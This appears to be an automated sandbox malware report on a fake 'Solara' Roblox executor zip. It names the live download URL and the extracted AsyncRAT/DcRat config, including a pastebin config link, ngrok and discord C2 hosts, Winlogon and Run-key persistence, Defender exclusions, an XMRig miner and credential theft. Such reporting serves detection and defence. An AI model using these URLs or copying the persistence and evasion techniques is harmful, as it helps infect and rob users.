Resubmissions
24-10-2024 19:59
241024-yqt7dsscpl 624-10-2024 19:55
241024-yndfvssclj 1024-10-2024 19:54
241024-ymwk2ssckm 824-10-2024 12:40
241024-pwm6la1hmn 1024-10-2024 12:34
241024-psafbs1gkr 1024-10-2024 12:24
241024-pk4zza1drl 1022-10-2024 13:05
241022-qbwsnsybrr 10Analysis
-
max time kernel
299s -
max time network
300s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
24-10-2024 12:34
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://raw.githubusercontent.com/ByterCode/Solara-Excutor/refs/heads/main/Solara%20NEW.zip
Resource
win10v2004-20241007-en
General
-
Target
https://raw.githubusercontent.com/ByterCode/Solara-Excutor/refs/heads/main/Solara%20NEW.zip
Malware Config
Extracted
asyncrat
1.0.7
Roblox
DcRatMutex_qwqdanchun
-
delay
1
-
install
true
-
install_file
svchost.exe
-
install_folder
%AppData%
-
pastebin_config
https://pastebin.com/raw/rACMKa5f
Signatures
-
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Modifies WinLogon for persistence 2 TTPs 6 IoCs
Processes:
RunShell.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Windows Portable Devices\\RuntimeBroker.exe\", \"C:\\agentComponentFontNet\\System.exe\", \"C:\\Recovery\\WindowsRE\\msedge.exe\", \"C:\\Program Files\\Windows Security\\BrowserCore\\en-US\\lsass.exe\"" RunShell.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Windows Portable Devices\\RuntimeBroker.exe\", \"C:\\agentComponentFontNet\\System.exe\", \"C:\\Recovery\\WindowsRE\\msedge.exe\", \"C:\\Program Files\\Windows Security\\BrowserCore\\en-US\\lsass.exe\", \"C:\\agentComponentFontNet\\TrustedInstaller.exe\"" RunShell.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Windows Portable Devices\\RuntimeBroker.exe\", \"C:\\agentComponentFontNet\\System.exe\", \"C:\\Recovery\\WindowsRE\\msedge.exe\", \"C:\\Program Files\\Windows Security\\BrowserCore\\en-US\\lsass.exe\", \"C:\\agentComponentFontNet\\TrustedInstaller.exe\", \"C:\\Users\\Admin\\AppData\\Roaming\\Windows\\Defender\\RunShell.exe\"" RunShell.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Windows Portable Devices\\RuntimeBroker.exe\"" RunShell.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Windows Portable Devices\\RuntimeBroker.exe\", \"C:\\agentComponentFontNet\\System.exe\"" RunShell.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Windows Portable Devices\\RuntimeBroker.exe\", \"C:\\agentComponentFontNet\\System.exe\", \"C:\\Recovery\\WindowsRE\\msedge.exe\"" RunShell.exe -
Process spawned unexpected child process 18 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6740 2952 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 400 2952 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6696 2952 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1844 2952 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2244 2952 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 7088 2952 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4428 2952 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6832 2952 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1664 2952 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6776 2952 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 7044 2952 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 7032 2952 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6540 2952 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6348 2952 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6352 2952 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1712 2952 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5680 2952 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6972 2952 schtasks.exe -
Async RAT payload 1 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Roaming\Windows\Defender\MpWinSDK.exe family_asyncrat -
Processes:
resource yara_rule C:\Users\Admin\AppData\Roaming\Windows\Defender\MpDefenderCoreService.exe dcrat C:\Users\Admin\AppData\Roaming\Windows\Defender\MpCmdRun.exe dcrat behavioral1/memory/6884-605-0x00000000001B0000-0x0000000000326000-memory.dmp dcrat behavioral1/memory/6508-666-0x0000000000760000-0x00000000008EA000-memory.dmp dcrat -
XMRig Miner payload 1 IoCs
Processes:
resource yara_rule behavioral1/memory/6624-862-0x0000000140000000-0x0000000140786000-memory.dmp xmrig -
Command and Scripting Interpreter: PowerShell 1 TTPs 17 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 4136 powershell.exe 6764 powershell.exe 4912 powershell.exe 5308 powershell.exe 6148 powershell.exe 5264 powershell.exe 1896 powershell.exe 6944 powershell.exe 6288 powershell.exe 3592 powershell.exe 3764 powershell.exe 5944 powershell.exe 5500 powershell.exe 6796 powershell.exe 4712 powershell.exe 2544 powershell.exe 6444 powershell.exe -
Drops file in Drivers directory 3 IoCs
Processes:
attrib.exeMpWinDefenderService.exeattrib.exedescription ioc process File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe File opened for modification C:\Windows\System32\drivers\etc\hosts MpWinDefenderService.exe File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe -
Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it showing in Explorer etc.
-
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
reg.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion reg.exe -
Checks computer location settings 2 TTPs 10 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
MpCmdRun.exeWScript.exeGoogleUpdater.exeWinSFX.exeWinDefender.exeMpDefenderCoreService.exeRunShell.exeWScript.exeWScript.exeMpWinSDK.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation MpCmdRun.exe Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation GoogleUpdater.exe Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation WinSFX.exe Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation WinDefender.exe Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation MpDefenderCoreService.exe Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation RunShell.exe Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation MpWinSDK.exe -
Clipboard Data 1 TTPs 2 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
-
Drops startup file 2 IoCs
Processes:
javaw.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WinSFX.exe javaw.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WinSFX.exe javaw.exe -
Executes dropped EXE 17 IoCs
Processes:
WinSFX.exeMpWinHelper32.exeWinDefender.exeMpDefenderRuntime.exeMpWinDefenderService.exeMpWinDefenderService.exeMpDefenderCoreService.exeMpCmdRun.exeMpWinSDK.execontainerRuntime.exeRunShell.exeMsHyperPort.exesvchost.exerar.exeGoogleUpdater.exesihost64.exeRunShell.exepid process 6068 WinSFX.exe 5276 MpWinHelper32.exe 5552 WinDefender.exe 5304 MpDefenderRuntime.exe 5748 MpWinDefenderService.exe 5804 MpWinDefenderService.exe 5312 MpDefenderCoreService.exe 5912 MpCmdRun.exe 5932 MpWinSDK.exe 6884 containerRuntime.exe 5688 RunShell.exe 6508 MsHyperPort.exe 7068 svchost.exe 4192 rar.exe 7108 GoogleUpdater.exe 6872 sihost64.exe 6496 RunShell.exe -
Loads dropped DLL 17 IoCs
Processes:
javaw.exeMpWinDefenderService.exepid process 5472 javaw.exe 5804 MpWinDefenderService.exe 5804 MpWinDefenderService.exe 5804 MpWinDefenderService.exe 5804 MpWinDefenderService.exe 5804 MpWinDefenderService.exe 5804 MpWinDefenderService.exe 5804 MpWinDefenderService.exe 5804 MpWinDefenderService.exe 5804 MpWinDefenderService.exe 5804 MpWinDefenderService.exe 5804 MpWinDefenderService.exe 5804 MpWinDefenderService.exe 5804 MpWinDefenderService.exe 5804 MpWinDefenderService.exe 5804 MpWinDefenderService.exe 5804 MpWinDefenderService.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 12 IoCs
Processes:
RunShell.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System = "\"C:\\agentComponentFontNet\\System.exe\"" RunShell.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\msedge = "\"C:\\Recovery\\WindowsRE\\msedge.exe\"" RunShell.exe Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\TrustedInstaller = "\"C:\\agentComponentFontNet\\TrustedInstaller.exe\"" RunShell.exe Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RunShell = "\"C:\\Users\\Admin\\AppData\\Roaming\\Windows\\Defender\\RunShell.exe\"" RunShell.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Program Files\\Windows Portable Devices\\RuntimeBroker.exe\"" RunShell.exe Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System = "\"C:\\agentComponentFontNet\\System.exe\"" RunShell.exe Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\msedge = "\"C:\\Recovery\\WindowsRE\\msedge.exe\"" RunShell.exe Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\lsass = "\"C:\\Program Files\\Windows Security\\BrowserCore\\en-US\\lsass.exe\"" RunShell.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\lsass = "\"C:\\Program Files\\Windows Security\\BrowserCore\\en-US\\lsass.exe\"" RunShell.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\TrustedInstaller = "\"C:\\agentComponentFontNet\\TrustedInstaller.exe\"" RunShell.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RunShell = "\"C:\\Users\\Admin\\AppData\\Roaming\\Windows\\Defender\\RunShell.exe\"" RunShell.exe Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Program Files\\Windows Portable Devices\\RuntimeBroker.exe\"" RunShell.exe -
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
javaw.exedescription ioc process File opened (read-only) \??\F: javaw.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 12 IoCs
Processes:
flow ioc 51 discord.com 52 discord.com 59 raw.githubusercontent.com 81 pastebin.com 473 2.tcp.eu.ngrok.io 3 raw.githubusercontent.com 7 raw.githubusercontent.com 49 discord.com 61 raw.githubusercontent.com 80 pastebin.com 430 2.tcp.eu.ngrok.io 516 2.tcp.eu.ngrok.io -
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 45 api.ipify.org 46 api.ipify.org 47 ip-api.com 88 ip-api.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Drops file in System32 directory 6 IoCs
Processes:
GoogleUpdater.execsc.exeMpWinHelper32.exedescription ioc process File created C:\Windows\system32\Microsoft\Libs\WR64.sys GoogleUpdater.exe File created \??\c:\Windows\System32\CSCB59BB1DD46334AD8911ABF5DB637A37.TMP csc.exe File created \??\c:\Windows\System32\enb1sa.exe csc.exe File created C:\Windows\system32\GoogleUpdater.exe MpWinHelper32.exe File opened for modification C:\Windows\system32\GoogleUpdater.exe MpWinHelper32.exe File created C:\Windows\system32\Microsoft\Libs\sihost64.exe GoogleUpdater.exe -
Enumerates processes with tasklist 1 TTPs 4 IoCs
Processes:
tasklist.exetasklist.exetasklist.exetasklist.exepid process 5096 tasklist.exe 5704 tasklist.exe 6676 tasklist.exe 6412 tasklist.exe -
Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
Processes:
GoogleUpdater.exedescription pid process target process PID 7108 set thread context of 6624 7108 GoogleUpdater.exe explorer.exe -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\_MEI57482\python313.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI57482\_ctypes.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI57482\libffi-8.dll upx behavioral1/memory/5804-417-0x00007FFD470F0000-0x00007FFD470FF000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI57482\_ssl.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI57482\_sqlite3.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI57482\_socket.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI57482\_queue.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI57482\_lzma.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI57482\_hashlib.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI57482\_decimal.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI57482\_bz2.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI57482\unicodedata.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI57482\sqlite3.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI57482\select.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI57482\libssl-3.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI57482\libcrypto-3.dll upx behavioral1/memory/5804-398-0x00007FFD31BB0000-0x00007FFD31BD7000-memory.dmp upx behavioral1/memory/5804-383-0x00007FFD31030000-0x00007FFD31693000-memory.dmp upx behavioral1/memory/5804-458-0x00007FFD30E60000-0x00007FFD30E8B000-memory.dmp upx behavioral1/memory/5804-467-0x00007FFD31B50000-0x00007FFD31B69000-memory.dmp upx behavioral1/memory/5804-469-0x00007FFD32D80000-0x00007FFD32DA5000-memory.dmp upx behavioral1/memory/5804-470-0x00007FFD32C00000-0x00007FFD32D7F000-memory.dmp upx behavioral1/memory/5804-471-0x00007FFD32BE0000-0x00007FFD32BF9000-memory.dmp upx behavioral1/memory/5804-475-0x00007FFD42C50000-0x00007FFD42C5D000-memory.dmp upx behavioral1/memory/5804-479-0x00007FFD2F5C0000-0x00007FFD2F5F4000-memory.dmp upx behavioral1/memory/5804-482-0x00007FFD31BB0000-0x00007FFD31BD7000-memory.dmp upx behavioral1/memory/5804-481-0x00007FFD290B0000-0x00007FFD2917E000-memory.dmp upx behavioral1/memory/5804-480-0x00007FFD27AE0000-0x00007FFD28013000-memory.dmp upx behavioral1/memory/5804-478-0x00007FFD31030000-0x00007FFD31693000-memory.dmp upx behavioral1/memory/5804-500-0x00007FFD32E00000-0x00007FFD32EB3000-memory.dmp upx behavioral1/memory/5804-499-0x00007FFD30E60000-0x00007FFD30E8B000-memory.dmp upx behavioral1/memory/5804-497-0x00007FFD482C0000-0x00007FFD482D4000-memory.dmp upx behavioral1/memory/5804-498-0x00007FFD485B0000-0x00007FFD485BD000-memory.dmp upx behavioral1/memory/5804-585-0x00007FFD32D80000-0x00007FFD32DA5000-memory.dmp upx behavioral1/memory/5804-650-0x00007FFD32C00000-0x00007FFD32D7F000-memory.dmp upx behavioral1/memory/5804-775-0x00007FFD2F5C0000-0x00007FFD2F5F4000-memory.dmp upx behavioral1/memory/5804-777-0x00007FFD290B0000-0x00007FFD2917E000-memory.dmp upx behavioral1/memory/5804-776-0x00007FFD27AE0000-0x00007FFD28013000-memory.dmp upx behavioral1/memory/5804-818-0x00007FFD32C00000-0x00007FFD32D7F000-memory.dmp upx behavioral1/memory/5804-826-0x00007FFD32E00000-0x00007FFD32EB3000-memory.dmp upx behavioral1/memory/5804-812-0x00007FFD31030000-0x00007FFD31693000-memory.dmp upx behavioral1/memory/5804-1227-0x00007FFD2F5C0000-0x00007FFD2F5F4000-memory.dmp upx behavioral1/memory/5804-1232-0x00007FFD32D80000-0x00007FFD32DA5000-memory.dmp upx behavioral1/memory/5804-1231-0x00007FFD485B0000-0x00007FFD485BD000-memory.dmp upx behavioral1/memory/5804-1230-0x00007FFD482C0000-0x00007FFD482D4000-memory.dmp upx behavioral1/memory/5804-1229-0x00007FFD290B0000-0x00007FFD2917E000-memory.dmp upx behavioral1/memory/5804-1228-0x00007FFD27AE0000-0x00007FFD28013000-memory.dmp upx behavioral1/memory/5804-1226-0x00007FFD42C50000-0x00007FFD42C5D000-memory.dmp upx behavioral1/memory/5804-1225-0x00007FFD32BE0000-0x00007FFD32BF9000-memory.dmp upx behavioral1/memory/5804-1224-0x00007FFD32C00000-0x00007FFD32D7F000-memory.dmp upx behavioral1/memory/5804-1223-0x00007FFD32E00000-0x00007FFD32EB3000-memory.dmp upx behavioral1/memory/5804-1222-0x00007FFD31B50000-0x00007FFD31B69000-memory.dmp upx behavioral1/memory/5804-1221-0x00007FFD30E60000-0x00007FFD30E8B000-memory.dmp upx behavioral1/memory/5804-1220-0x00007FFD470F0000-0x00007FFD470FF000-memory.dmp upx behavioral1/memory/5804-1219-0x00007FFD31BB0000-0x00007FFD31BD7000-memory.dmp upx behavioral1/memory/5804-1218-0x00007FFD31030000-0x00007FFD31693000-memory.dmp upx -
Drops file in Program Files directory 4 IoCs
Processes:
RunShell.exedescription ioc process File created C:\Program Files\Windows Security\BrowserCore\en-US\lsass.exe RunShell.exe File created C:\Program Files\Windows Security\BrowserCore\en-US\6203df4a6bafc7 RunShell.exe File created C:\Program Files\Windows Portable Devices\RuntimeBroker.exe RunShell.exe File created C:\Program Files\Windows Portable Devices\9e8d7a4ca61bd9 RunShell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
Processes:
netsh.exedescription ioc process Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 11 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
WinSFX.exeWScript.exeWinDefender.exeMpCmdRun.exeWScript.exeSolara NEW.exeMpDefenderCoreService.exeWScript.execmd.execmd.execmd.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WinSFX.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WinDefender.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MpCmdRun.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Solara NEW.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MpDefenderCoreService.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
Processes:
cmd.exePING.EXEpid process 6064 cmd.exe 2260 PING.EXE -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
-
Checks processor information in registry 2 TTPs 12 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
firefox.exefirefox.exefirefox.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe -
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 1300 timeout.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
-
Enumerates system info in registry 2 TTPs 6 IoCs
Processes:
chrome.exemsedge.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
-
Kills process with taskkill 18 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 6832 taskkill.exe 2224 taskkill.exe 400 taskkill.exe 6264 taskkill.exe 3412 taskkill.exe 5912 taskkill.exe 6012 taskkill.exe 5988 taskkill.exe 6492 taskkill.exe 6412 taskkill.exe 5420 taskkill.exe 6904 taskkill.exe 5140 taskkill.exe 6956 taskkill.exe 4964 taskkill.exe 1712 taskkill.exe 6748 taskkill.exe 7120 taskkill.exe -
Modifies data under HKEY_USERS 2 IoCs
Processes:
chrome.exedescription ioc process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133742470251356163" chrome.exe -
Modifies registry class 6 IoCs
Processes:
msedge.exeWinSFX.exeMpDefenderCoreService.exeMpCmdRun.exeRunShell.exefirefox.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings msedge.exe Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings WinSFX.exe Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings MpDefenderCoreService.exe Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings MpCmdRun.exe Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings RunShell.exe Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings firefox.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs ping.exe 1 TTPs 1 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 20 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 7032 schtasks.exe 1844 schtasks.exe 6832 schtasks.exe 6776 schtasks.exe 1664 schtasks.exe 6352 schtasks.exe 1712 schtasks.exe 6972 schtasks.exe 6696 schtasks.exe 2244 schtasks.exe 7088 schtasks.exe 6348 schtasks.exe 6840 schtasks.exe 5680 schtasks.exe 2104 schtasks.exe 400 schtasks.exe 4428 schtasks.exe 6740 schtasks.exe 7044 schtasks.exe 6540 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
